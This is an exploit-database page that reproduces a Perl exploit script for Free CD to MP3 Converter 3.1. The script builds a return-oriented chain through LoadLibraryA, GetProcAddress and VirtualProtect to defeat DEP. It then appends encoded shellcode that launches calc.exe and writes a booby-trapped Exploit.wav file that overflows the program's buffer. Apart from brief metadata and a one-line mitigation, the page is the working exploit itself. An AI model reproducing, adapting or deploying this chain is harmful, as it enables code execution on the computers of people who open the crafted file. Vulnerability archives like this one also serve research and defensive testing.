header-logo
Suggest Exploit
vendor:
Free CD to MP3 Converter
by:
C4SS!0 G0M3S
7.2
CVSS
HIGH
Universal DEP Bypass
20
CWE
Product Name: Free CD to MP3 Converter
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:illusions:free_cd_to_mp3_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WIN-XP SP3 Brazilian Portuguese
2011

Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit

This exploit uses a combination of LoadLibraryA, GetProcAddress, and VirtualProtect to bypass Data Execution Prevention (DEP) on Free CD to MP3 Converter 3.1. The exploit loads the kernel32.dll library, gets the address of the VirtualProtect function, and then calls VirtualProtect with the address of the shellcode, the size of the shellcode, and the desired protection.

Mitigation:

Ensure that Data Execution Prevention (DEP) is enabled and properly configured.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#Dep bypass method: 
#LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :)
# 
#

print q{

		Created By C4SS!0 G0M3S	
		E-mail louredo_@hotmail.com
		Blog net-fuzzer.blogspot.com
		
};
sleep(2);
#Endereco para LoadLibraryA 0x672CA660
##################################ROP FOR LOAD "kernel32.dll"#############################################
my $rop = pack('V',0x00418764); # POP ESI # RETN  
$rop .= pack('V',0x672CA660); # Address to LoadLibraryA
$rop .= pack('V',0x00412d09); # POP EBP # RETN
$rop .= pack('V',0x004AD39B); # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN  // Endereço de retorno da funçao LoadLibraryA
$rop .= pack('V',0x00472be9); # PUSHAD # POP EBX # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 27;
##################################ROP END HERE###########################################################

#Endereço para GetProcAddress 0x672CA668  
##################################ROP FOR Function GetProcAddress########################################
$rop .= pack('V',0x0048004d);  # POP EBP # RETN  
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x00409a7f);  # POP EDI # RETN
$rop .= pack('V',0x672CA668);  # Endereço para GetProcAddress
$rop .= pack('V',0x0042ad45);  # PUSH ESP # POP ESI # RETN
$rop .= pack('V',0x004a1b0e);  # POP ESI # RETN 
$rop .= pack('V',0x004AD39B);  # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN  // Endereço de retorno da funçao GetProcAddress
$rop .= pack('V',0x00421953);  # ADD EBP,EAX # RETN
$rop .= pack('V',0x004c0634);  # PUSHAD # RETN 
$rop .= "VirtualProtect\x00";
$rop .= "A" x 25;
##################################ROP END HERE###########################################################

#################################ROP FOR VirtualProtect#################################################
$rop .= pack('V',0x0042c786);  # XCHG EAX,ESI # RETN // Endereço da VirtualProtect
$rop .= pack('V',0x004d2c70);  # POP EBP # RETN
$rop .= pack('V',0x0047E58B);  # JMP ESP // Endereço de retorno da funçao VirtualProtect
$rop .= pack('V',0x0046abf7);  # POP EBX # RETN
$rop .= pack('V',0x00000400);  # O valor de dwSize 
$rop .= pack('V',0x00402bb4);  # POP EDX # RETN 
$rop .= pack('V',0x00000040);  # Valor de flNewProtect
$rop .= pack('V',0x10002b9c);  # POP ECX # RETN 
$rop .= pack('V',0x10007064);  # Valor de lpflOldProtect
$rop .= pack('V',0x00472be9);  # PUSHAD # POP EBX # RETN 
#################################ROP END HERE###########################################################
my $shellcode = 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK".
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO".
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9". #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ". #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN".
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8".
"WDN0SUK8WOMV4DNNTWPYWN27KA";

my $buf = "A" x 4112;
$buf .= $rop;
$buf .= "\x8B\xC4\x83\xC0\x20\xFF\xD0".("A" x 21).$shellcode;
print "\t\t[+]Creating File Exploit.wav...\n";
sleep(1);
open(f,">Exploit.wav") || die "[-]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.wav Created Successfully.\n";
sleep(1);

Navigation

Suggest Exploit

Services By CQR